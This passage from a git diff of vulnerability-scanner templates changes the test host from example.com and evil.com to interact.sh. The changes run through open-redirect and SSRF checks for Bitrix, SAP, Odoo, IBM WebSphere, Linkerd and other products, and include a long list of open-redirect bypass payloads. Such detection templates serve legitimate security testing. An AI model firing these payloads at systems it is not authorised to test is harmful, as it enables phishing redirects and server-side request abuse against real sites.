ample.com&source=example.com&src=example.com&target=example.com&to=example.com&uri=example.com&url=example.com&val=example.com&validate=example.com&view=example.com&window=example.com&redirect_to=example.com&ret=example.com&r2=example.com&img=example.com&u=example.com&r=example.com&URL=example.com&AuthState=example.com'
+ - '%0a/interact.sh/'
+ - '%0d/interact.sh/'
+ - '%00/interact.sh/'
+ - '%09/interact.sh/'
+ - '%5C%5Cinteract.sh/%252e%252e%252f'
+ - '%5Cinteract.sh'
+ - '%5cinteract.sh/%2f%2e%2e'
+ - '%5c{{RootURL}}interact.sh/%2f%2e%2e'
+ - '../interact.sh'
+ - '.interact.sh'
+ - '/%5cinteract.sh'
+ - '////\;@interact.sh'
+ - '////interact.sh'
+ - '///interact.sh'
+ - '///interact.sh/%2f%2e%2e'
+ - '///interact.sh@//'
+ - '///{{RootURL}}interact.sh/%2f%2e%2e'
+ - '//;@interact.sh'
+ - '//\/interact.sh/'
+ - '//\@interact.sh'
+ - '//\interact.sh'
+ - '//\tinteract.sh/'
+ - '//interact.sh/%2F..'
+ - '//interact.sh//'
+ - '//interact.sh@//'
+ - '//interact.sh\tinteract.sh/'
+ - '//https://interact.sh@//'
+ - '/<>//interact.sh'
+ - '/\/\/interact.sh/'
+ - '/\/interact.sh'
+ - '/\interact.sh'
+ - '/interact.sh'
+ - '/interact.sh/%2F..'
+ - '/interact.sh/'
+ - '/interact.sh/..;/css'
+ - '/https:interact.sh'
+ - '/{{RootURL}}interact.sh/'
+ - '/〱interact.sh'
+ - '/〵interact.sh'
+ - '/ゝinteract.sh'
+ - '/ーinteract.sh'
+ - '/ーinteract.sh'
+ - '<>//interact.sh'
+ - '@interact.sh'
+ - '@https://interact.sh'
+ - '\/\/interact.sh/'
+ - 'interact%E3%80%82sh'
+ - 'interact.sh'
+ - 'interact.sh/'
+ - 'interact.sh//'
+ - 'interact.sh;@'
+ - 'https%3a%2f%2finteract.sh%2f'
+ - 'https:%0a%0dinteract.sh'
+ - 'https://%0a%0dinteract.sh'
+ - 'https://%09/interact.sh'
+ - 'https://%2f%2f.interact.sh/'
+ - 'https://%3F.interact.sh/'
+ - 'https://%5c%5c.interact.sh/'
+ - 'https://%5cinteract.sh@'
+ - 'https://%23.interact.sh/'
+ - 'https://.interact.sh'
+ - 'https://////interact.sh'
+ - 'https:///interact.sh'
+ - 'https:///interact.sh/%2e%2e'
+ - 'https:///interact.sh/%2f%2e%2e'
+ - 'https:///interact.sh@interact.sh/%2e%2e'
+ - 'https:///interact.sh@interact.sh/%2f%2e%2e'
+ - 'https://:80#@interact.sh/'
+ - 'https://:80?@interact.sh/'
+ - 'https://:@\@interact.sh'
+ - 'https://:@interact.sh\@interact.sh'
+ - 'https://:@interact.sh\@WillBeReplaced.com'
+ - 'https://;@interact.sh'
+ - 'https://\tinteract.sh/'
+ - 'https://interact.sh/interact.sh'
+ - 'https://interact.sh/https://interact.sh/'
+ - 'https://www.\.interact.sh'
+ - 'https:/\/\interact.sh'
+ - 'https:/\interact.sh'
+ - 'https:/interact.sh'
+ - 'https:interact.sh'
+ - '{{RootURL}}interact.sh'
+ - '〱interact.sh'
+ - '〵interact.sh'
+ - 'ゝinteract.sh'
+ - 'ーinteract.sh'
+ - 'ーinteract.sh'
+ - '?page=interact.sh&_url=interact.sh&callback=interact.sh&checkout_url=interact.sh&content=interact.sh&continue=interact.sh&continueTo=interact.sh&counturl=interact.sh&data=interact.sh&dest=interact.sh&dest_url=interact.sh&dir=interact.sh&document=interact.sh&domain=interact.sh&done=interact.sh&download=interact.sh&feed=interact.sh&file=interact.sh&host=interact.sh&html=interact.sh&http=interact.sh&https=interact.sh&image=interact.sh&image_src=interact.sh&image_url=interact.sh&imageurl=interact.sh&include=interact.sh&langTo=interact.sh&media=interact.sh&navigation=interact.sh&next=interact.sh&open=interact.sh&out=interact.sh&page=interact.sh&page_url=interact.sh&pageurl=interact.sh&path=interact.sh&picture=interact.sh&port=interact.sh&proxy=interact.sh&redir=interact.sh&redirect=interact.sh&redirectUri=interact.sh&redirectUrl=interact.sh&reference=interact.sh&referrer=interact.sh&req=interact.sh&request=interact.sh&retUrl=interact.sh&return=interact.sh&returnTo=interact.sh&return_path=interact.sh&return_to=interact.sh&rurl=interact.sh&show=interact.sh&site=interact.sh&source=interact.sh&src=interact.sh&target=interact.sh&to=interact.sh&uri=interact.sh&url=interact.sh&val=interact.sh&validate=interact.sh&view=interact.sh&window=interact.sh&redirect_to=interact.sh&ret=interact.sh&r2=interact.sh&img=interact.sh&u=interact.sh&r=interact.sh&URL=interact.sh&AuthState=interact.sh'
stop-at-first-match: true
matchers-condition: and
@@ -111,7 +111,7 @@ requests:
- type: regex
part: header
regex:
- - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
+ - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
- type: status
status:
diff --git a/vulnerabilities/httpbin/httpbin-open-redirect.yaml b/vulnerabilities/httpbin/httpbin-open-redirect.yaml
index 08aff96109..961d4ae06f 100644
--- a/vulnerabilities/httpbin/httpbin-open-redirect.yaml
+++ b/vulnerabilities/httpbin/httpbin-open-redirect.yaml
@@ -15,13 +15,13 @@ info:
requests:
- method: GET
path:
- - "{{BaseURL}}/redirect-to?url=https%3A%2F%2Fexample.com"
+ - "{{BaseURL}}/redirect-to?url=https%3A%2F%2Finteract.sh"
matchers-condition: and
matchers:
- type: dsl
dsl:
- - 'location == "https://example.com"'
+ - 'location == "https://interact.sh"'
- type: status
status:
diff --git a/vulnerabilities/ibm/ibm-websphere-ssrf.yaml b/vulnerabilities/ibm/ibm-websphere-ssrf.yaml
index 777b9a5e06..a387ce201c 100644
--- a/vulnerabilities/ibm/ibm-websphere-ssrf.yaml
+++ b/vulnerabilities/ibm/ibm-websphere-ssrf.yaml
@@ -11,8 +11,8 @@ info:
requests:
- method: GET
path:
- - '{{BaseURL}}/docpicker/internal_proxy/http/example.com'
- - '{{BaseURL}}/wps/PA_WCM_Authoring_UI/proxy/http/example.com'
+ - '{{BaseURL}}/docpicker/internal_proxy/http/interact.sh'
+ - '{{BaseURL}}/wps/PA_WCM_Authoring_UI/proxy/http/interact.sh'
redirects: true
max-redirects: 2
@@ -26,4 +26,4 @@ requests:
- type: word
words:
- - "Example Domain"
\ No newline at end of file
+ - " Interactsh Server
"
\ No newline at end of file
diff --git a/vulnerabilities/linkerd/linkerd-ssrf.yaml b/vulnerabilities/linkerd/linkerd-ssrf.yaml
index ec72073405..23f52c1e15 100644
--- a/vulnerabilities/linkerd/linkerd-ssrf.yaml
+++ b/vulnerabilities/linkerd/linkerd-ssrf.yaml
@@ -13,7 +13,7 @@ requests:
path:
- "{{BaseURL}}"
headers:
- l5d-dtab: /svc/* => /$/inet/example.com/443
+ l5d-dtab: /svc/* => /$/inet/interact.sh/443
matchers-condition: or
matchers:
diff --git a/vulnerabilities/netsweeper/netsweeper-open-redirect.yaml b/vulnerabilities/netsweeper/netsweeper-open-redirect.yaml
index 290e17322f..b1dbdbf43a 100644
--- a/vulnerabilities/netsweeper/netsweeper-open-redirect.yaml
+++ b/vulnerabilities/netsweeper/netsweeper-open-redirect.yaml
@@ -12,10 +12,10 @@ info:
requests:
- method: GET
path:
- - "{{BaseURL}}/webadmin/authportal/bounce.php?url=https://example.com/"
+ - "{{BaseURL}}/webadmin/authportal/bounce.php?url=https://interact.sh/"
matchers:
- type: regex
part: header
regex:
- - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$'
+ - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$'
diff --git a/vulnerabilities/other/aspnuke-openredirect.yaml b/vulnerabilities/other/aspnuke-openredirect.yaml
index e6ce2c4e2f..1dcc28d81d 100644
--- a/vulnerabilities/other/aspnuke-openredirect.yaml
+++ b/vulnerabilities/other/aspnuke-openredirect.yaml
@@ -9,10 +9,10 @@ info:
requests:
- method: GET
path:
- - "{{BaseURL}}/gotoURL.asp?url=example.com&id=43569"
+ - "{{BaseURL}}/gotoURL.asp?url=interact.sh&id=43569"
matchers:
- type: regex
part: header
regex:
- - '(?m)^(?:Location\s*:\s*)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?example\.com(?:\s*)$'
\ No newline at end of file
+ - '(?m)^(?:Location\s*:\s*)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?interact\.sh(?:\s*)$'
\ No newline at end of file
diff --git a/vulnerabilities/other/bitrix-open-redirect.yaml b/vulnerabilities/other/bitrix-open-redirect.yaml
index 676932a520..3ddf1a643c 100644
--- a/vulnerabilities/other/bitrix-open-redirect.yaml
+++ b/vulnerabilities/other/bitrix-open-redirect.yaml
@@ -12,25 +12,25 @@ info:
requests:
- method: GET
path:
- - '{{BaseURL}}/bitrix/rk.php?goto=https://example.com'
- - '{{BaseURL}}/bitrix/redirect.php?event1=&event2=&event3=&goto=https://example.com'
- - '{{BaseURL}}/bitrix/redirect.php?event3=352513&goto=https://example.com'
- - '{{BaseURL}}/bitrix/redirect.php?event1=demo_out&event2=sm_demo&event3=pdemo&goto=https://example.com'
- - '{{BaseURL}}/bitrix/redirect.php?site_id=s1&event1=select_product_t1&event2=contributions&goto=https://example.com'
- - '{{BaseURL}}/bitrix/redirect.php?event1=&event2=&event3=download&goto=https://example.com'
- - '{{BaseURL}}/bitrix/rk.php?id=28&site_id=s2&event1=banner&event2=click&event3=3+%2F+%5B28%5D+%5BBANNER_AREA_FOOTER2%5D+%D0%9F%D0%BE%D1%81%D0%B5%D1%82%D0%B8%D1%82%D0%B5+%D0%B2%D0%B2%D0%BE%D0%B4%D0%BD%D1%83%D1%8E+%D0%B1%D0%B5%D1%81%D0%BF%D0%BB%D0%B0%D1%82%D0%BD%D1%83%D1%8E+%D0%BB%D0%B5%D0%BA%D1%86%D0%B8%D1%8E+APTOS&goto=https://example.com'
- - '{{BaseURL}}/bitrix/rk.php?id=84&site_id=n1&event1=banner&event2=click&event3=1+%2F+%5B84%5D+%5BMOBILE_HOME%5D+Love+Card&goto=https://example.com'
- - '{{BaseURL}}/bitrix/rk.php?id=691&site_id=s3&event1=banner&event2=click&event3=1+%2F+%5B691%5D+%5BNEW_INDEX_BANNERS%5D+Trade-in+football&goto=https://example.com'
- - '{{BaseURL}}/bitrix/rk.php?id=129&event1=banner&event2=click&event3=5+%2F+%5B129%5D+%5BGARMIN_AKCII%5D+Garmin+%E1%EE%ED%F3%F1+%ED%EE%E2%EE%F1%F2%FC+%E2+%E0%EA%F6%E8%E8&goto=https://example.com'
- - '{{BaseURL}}/bitrix/redirect.php?event1=%D0%A1%D0%BF%D0%B5%D1%86%D0%B8%D0%B0%D0%BB%D1%8C%D0%BD%D1%8B%D0%B5+%D0%B4%D0%BE%D0%BA%D0%BB%D0%B0%D0%B4%D1%8B&event2=&event3=download&goto=https://example.com'
- - '{{BaseURL}}/bitrix/redirect.php?event1=%D0%A1%D0%BF%D0%B5%D1%86%D0%B8%D0%B0%D0%BB%D1%8C%D0%BD%D1%8B%D0%B5+%D0%B4%D0%BE%D0%BA%D0%BB%D0%B0%D0%B4%D1%8B&event2=&event3=download&goto=https://example.com'
+ - '{{BaseURL}}/bitrix/rk.php?goto=https://interact.sh'
+ - '{{BaseURL}}/bitrix/redirect.php?event1=&event2=&event3=&goto=https://interact.sh'
+ - '{{BaseURL}}/bitrix/redirect.php?event3=352513&goto=https://interact.sh'
+ - '{{BaseURL}}/bitrix/redirect.php?event1=demo_out&event2=sm_demo&event3=pdemo&goto=https://interact.sh'
+ - '{{BaseURL}}/bitrix/redirect.php?site_id=s1&event1=select_product_t1&event2=contributions&goto=https://interact.sh'
+ - '{{BaseURL}}/bitrix/redirect.php?event1=&event2=&event3=download&goto=https://interact.sh'
+ - '{{BaseURL}}/bitrix/rk.php?id=28&site_id=s2&event1=banner&event2=click&event3=3+%2F+%5B28%5D+%5BBANNER_AREA_FOOTER2%5D+%D0%9F%D0%BE%D1%81%D0%B5%D1%82%D0%B8%D1%82%D0%B5+%D0%B2%D0%B2%D0%BE%D0%B4%D0%BD%D1%83%D1%8E+%D0%B1%D0%B5%D1%81%D0%BF%D0%BB%D0%B0%D1%82%D0%BD%D1%83%D1%8E+%D0%BB%D0%B5%D0%BA%D1%86%D0%B8%D1%8E+APTOS&goto=https://interact.sh'
+ - '{{BaseURL}}/bitrix/rk.php?id=84&site_id=n1&event1=banner&event2=click&event3=1+%2F+%5B84%5D+%5BMOBILE_HOME%5D+Love+Card&goto=https://interact.sh'
+ - '{{BaseURL}}/bitrix/rk.php?id=691&site_id=s3&event1=banner&event2=click&event3=1+%2F+%5B691%5D+%5BNEW_INDEX_BANNERS%5D+Trade-in+football&goto=https://interact.sh'
+ - '{{BaseURL}}/bitrix/rk.php?id=129&event1=banner&event2=click&event3=5+%2F+%5B129%5D+%5BGARMIN_AKCII%5D+Garmin+%E1%EE%ED%F3%F1+%ED%EE%E2%EE%F1%F2%FC+%E2+%E0%EA%F6%E8%E8&goto=https://interact.sh'
+ - '{{BaseURL}}/bitrix/redirect.php?event1=%D0%A1%D0%BF%D0%B5%D1%86%D0%B8%D0%B0%D0%BB%D1%8C%D0%BD%D1%8B%D0%B5+%D0%B4%D0%BE%D0%BA%D0%BB%D0%B0%D0%B4%D1%8B&event2=&event3=download&goto=https://interact.sh'
+ - '{{BaseURL}}/bitrix/redirect.php?event1=%D0%A1%D0%BF%D0%B5%D1%86%D0%B8%D0%B0%D0%BB%D1%8C%D0%BD%D1%8B%D0%B5+%D0%B4%D0%BE%D0%BA%D0%BB%D0%B0%D0%B4%D1%8B&event2=&event3=download&goto=https://interact.sh'
stop-at-first-match: true
matchers-condition: and
matchers:
- type: regex
regex:
- - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$'
+ - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$'
part: header
- type: status
diff --git a/vulnerabilities/other/dedecms-openredirect.yaml b/vulnerabilities/other/dedecms-openredirect.yaml
index 689d98efa2..f240d95c4d 100644
--- a/vulnerabilities/other/dedecms-openredirect.yaml
+++ b/vulnerabilities/other/dedecms-openredirect.yaml
@@ -14,13 +14,13 @@ info:
requests:
- method: GET
path:
- - "{{BaseURL}}/plus/download.php?open=1&link=aHR0cHM6Ly9ldmlsLmNvbQo="
+ - "{{BaseURL}}/plus/download.php?open=1&link=aHR0cHM6Ly9pbnRlcmFjdC5zaA=="
matchers-condition: and
matchers:
- type: word
words:
- - "Location: https://evil.com"
+ - "Location: https://interact.sh"
part: header
- type: status
diff --git a/vulnerabilities/other/homeautomation-v3-openredirect.yaml b/vulnerabilities/other/homeautomation-v3-openredirect.yaml
index 539e6eb49d..f73aa868e7 100644
--- a/vulnerabilities/other/homeautomation-v3-openredirect.yaml
+++ b/vulnerabilities/other/homeautomation-v3-openredirect.yaml
@@ -12,10 +12,10 @@ info:
requests:
- method: GET
path:
- - "{{BaseURL}}/homeautomation_v3_3_2/api.php?do=groups/toggle&groupid=1&status=1&redirect=https://example.com/"
+ - "{{BaseURL}}/homeautomation_v3_3_2/api.php?do=groups/toggle&groupid=1&status=1&redirect=https://interact.sh/"
matchers:
- type: regex
regex:
- - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$'
+ - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$'
part: header
diff --git a/vulnerabilities/other/odoo-cms-redirect.yaml b/vulnerabilities/other/odoo-cms-redirect.yaml
index 3fecc9364a..431683a7c5 100644
--- a/vulnerabilities/other/odoo-cms-redirect.yaml
+++ b/vulnerabilities/other/odoo-cms-redirect.yaml
@@ -13,10 +13,10 @@ info:
requests:
- method: GET
path:
- - "{{BaseURL}}/website/lang/en_US?r=https://example.com/"
+ - "{{BaseURL}}/website/lang/en_US?r=https://interact.sh/"
matchers:
- type: regex
regex:
- - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$'
+ - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$'
part: header
diff --git a/vulnerabilities/other/otobo-open-redirect.yaml b/vulnerabilities/other/otobo-open-redirect.yaml
index f18da7474c..07698281aa 100644
--- a/vulnerabilities/other/otobo-open-redirect.yaml
+++ b/vulnerabilities/other/otobo-open-redirect.yaml
@@ -13,10 +13,10 @@ info:
requests:
- method: GET
path:
- - '{{BaseURL}}/otobo/index.pl?Action=ExternalURLJump;URL=http://www.example.com'
+ - '{{BaseURL}}/otobo/index.pl?Action=ExternalURLJump;URL=http://www.interact.sh'
matchers:
- type: regex
part: header
regex:
- - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
+ - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
diff --git a/vulnerabilities/other/pollbot-redirect.yaml b/vulnerabilities/other/pollbot-redirect.yaml
index c11e6df5d3..251cdd6ee3 100644
--- a/vulnerabilities/other/pollbot-redirect.yaml
+++ b/vulnerabilities/other/pollbot-redirect.yaml
@@ -13,14 +13,14 @@ info:
requests:
- method: GET
path:
- - '{{BaseURL}}/%0A/example.com/'
+ - '{{BaseURL}}/%0A/interact.sh/'
matchers-condition: and
matchers:
- type: regex
part: header
regex:
- - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
+ - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
- type: status
status:
diff --git a/vulnerabilities/other/sap-redirect.yaml b/vulnerabilities/other/sap-redirect.yaml
index 906e0b928c..fdb3dab9d7 100644
--- a/vulnerabilities/other/sap-redirect.yaml
+++ b/vulnerabilities/other/sap-redirect.yaml
@@ -11,7 +11,7 @@ requests:
- method: GET
path:
- - "{{BaseURL}}/sap/public/bc/icf/logoff?redirecturl=https://example.com"
+ - "{{BaseURL}}/sap/public/bc/icf/logoff?redirecturl=https://interact.sh"
matchers-condition: and
matchers:
@@ -22,7 +22,7 @@ requests:
- type: word
words:
- - "Location: https://www.example.com"
- - "Location: https://example.com"
+ - "Location: https://www.interact.sh"
+ - "Location: https://interact.sh"
condition: or
part: header
diff --git a/vulnerabilities/other/thinkific-redirect.yaml b/vulnerabilities/other/thinkific-redirect.yaml
index 90dc713ceb..a5baf35e95 100644
--- a/vulnerabilities/other/thinkific-redirect.yaml
+++ b/vulnerabilities/other/thinkific-redirect.yaml
@@ -10,7 +10,7 @@ requests:
- method: GET
path:
- - "{{BaseURL}}/api/sso/v2/sso/jwt?error_url=http://evil.com"
+ - "{{BaseURL}}/api/sso/v2/sso/jwt?error_url=http://interact.sh"
matchers-condition: and
matchers:
@@ -19,6 +19,6 @@ requests:
- 302
- type: word
words:
- - "